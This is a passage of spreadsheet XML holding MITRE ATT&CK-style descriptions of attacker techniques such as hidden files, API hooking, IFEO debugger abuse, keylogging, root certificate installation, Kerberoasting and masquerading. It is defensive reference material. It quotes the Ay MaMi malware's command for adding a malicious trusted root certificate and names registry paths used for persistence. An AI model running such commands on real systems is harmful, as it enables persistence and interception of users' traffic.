      <t>147</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and others.</t>
    </r>
  </si>
  <si>
    <t>T1158</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dir /a</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for Windows and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>ls –a</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for Linux and macOS).</t>
    </r>
  </si>
  <si>
    <r>
      <t>Users can mark specific files as hidden by using the attrib.exe binary. Simply do </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>attrib +h filename</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.</t>
    </r>
  </si>
  <si>
    <t>Linux/Mac</t>
  </si>
  <si>
    <r>
      <t>Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>148149</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>defaults write com.apple.finder AppleShowAllFiles YES</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and then relaunch the Finder Application.</t>
    </r>
  </si>
  <si>
    <t>Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app150. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.</t>
  </si>
  <si>
    <t>Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>T1179</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</si>
  <si>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t>
  </si>
  <si>
    <r>
      <t>Hooks procedures</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1519</t>
    </r>
  </si>
  <si>
    <r>
      <t>Import address table (IAT) hooking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, which use modifications to a process’s IAT, where pointers to imported API functions are stored.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9152153</t>
    </r>
  </si>
  <si>
    <r>
      <t>Inline hooking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, which overwrites the first bytes in an API function to redirect code flow.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9154153</t>
    </r>
  </si>
  <si>
    <r>
      <t>Similar to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Process Injection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> via continuous invocation when the functions are called through normal use.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Credential Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>155</t>
    </r>
  </si>
  <si>
    <t>Hooking is commonly utilized by Rootkits to conceal files,</t>
  </si>
  <si>
    <t>processes, Registry keys, and other objects in order to hide malware and associated behaviors.156</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <r>
      <t>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>157</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>158</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> A type-1 hypervisor operates at a level below the operating system and could be designed with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Rootkit</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> functionality to hide its existence from the guest operating system.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>159</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> A malicious hypervisor of this nature could be used to persist on systems through interruption.</t>
    </r>
  </si>
  <si>
    <t>T1183</t>
  </si>
  <si>
    <t>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notepad.exe”).160</t>
  </si>
  <si>
    <r>
      <t>IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>161</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> IFEOs are represented as Debugger Values in the Registry under </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>where </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>&lt;executable&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is the binary on which the debugger is attached.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>160</t>
    </r>
  </si>
  <si>
    <r>
      <t>Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Installing IFEO mechanisms may also provide </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> via continuous invocation.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Malware may also use IFEO for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Defense Evasion</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> by registering invalid debuggers that redirect and effectively disable various system and security applications.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>162163</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1202</t>
  </si>
  <si>
    <r>
      <t>Various Windows utilities may be used to execute commands, possibly without invoking </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. For example, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Forfiles</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Command-Line Interface</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, Run window, or via scripts.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>164165</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries may abuse these utilities for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Defense Evasion</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <r>
      <t>Adversaries can use methods of capturing user input for obtaining credentials for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Valid Accounts</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and information </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Collection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> that include keylogging and user input field interception.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes,</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>166</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>167</t>
    </r>
  </si>
  <si>
    <t>Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.</t>
  </si>
  <si>
    <r>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>External Remote Services</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Valid Accounts</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or as part of the initial compromise by exploitation of the externally facing web service.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>125</t>
    </r>
  </si>
  <si>
    <t>T1130</t>
  </si>
  <si>
    <t>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.168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t>
  </si>
  <si>
    <t>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credentials.169</t>
  </si>
  <si>
    <t>Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications.170</t>
  </si>
  <si>
    <r>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>171</t>
    </r>
  </si>
  <si>
    <t>In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.172</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <r>
      <t>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>173</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> InstallUtil is located in the .NET directories on a Windows system: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>[System.ComponentModel.RunInstaller(true)]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>174</t>
    </r>
  </si>
  <si>
    <t>T1208</t>
  </si>
  <si>
    <r>
      <t>Service principle names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>175</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>176177178179</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>180181</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Brute Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> attacks that may expose plaintext credentials.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>181180179</t>
    </r>
  </si>
  <si>
    <t>This same attack could be executed using service tickets captured from network traffic.181</t>
  </si>
  <si>
    <r>
      <t>Cracked hashes may enable </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Privilege Escalation</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Lateral Movement</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> via access to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Valid Accounts</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>178</t>
    </r>
  </si>
  <si>
    <t>T1171</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>182183</t>
    </r>
  </si>
  <si>
    <r>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Network Sniffing</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and crack the hashes offline through </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Brute Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to obtain the plaintext passwords.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Responder</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>184185186</t>
    </r>
  </si>
  <si>
    <t>T1177</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>187</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>DLL Side-Loading</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>DLL Search Order Hijacking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</t>
    </r>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>===Windows===</t>
  </si>
  <si>
    <t>Windows allows logon scripts to be run whenever a specific user or group of users log into a system.188 The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.</t>
  </si>
  <si>
    <t>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</si>
  <si>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Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root189. There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.190</t>
  </si>
  <si>
    <r>
      <t>A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>19126</t>
    </r>
  </si>
  <si>
    <t>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authentication.192</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <r>
      <t>In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>193</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>194</t>
    </r>
  </si>
  <si>
    <r>
      <t>An example of abuse of trusted locations in Windows would be the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".</t>
    </r>
  </si>
  <si>
    <t>Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. 195</t>
  </si>
  <si>
    <r>
      <t>An example of abuse of trusted locations in Linux would be the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>/bin</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
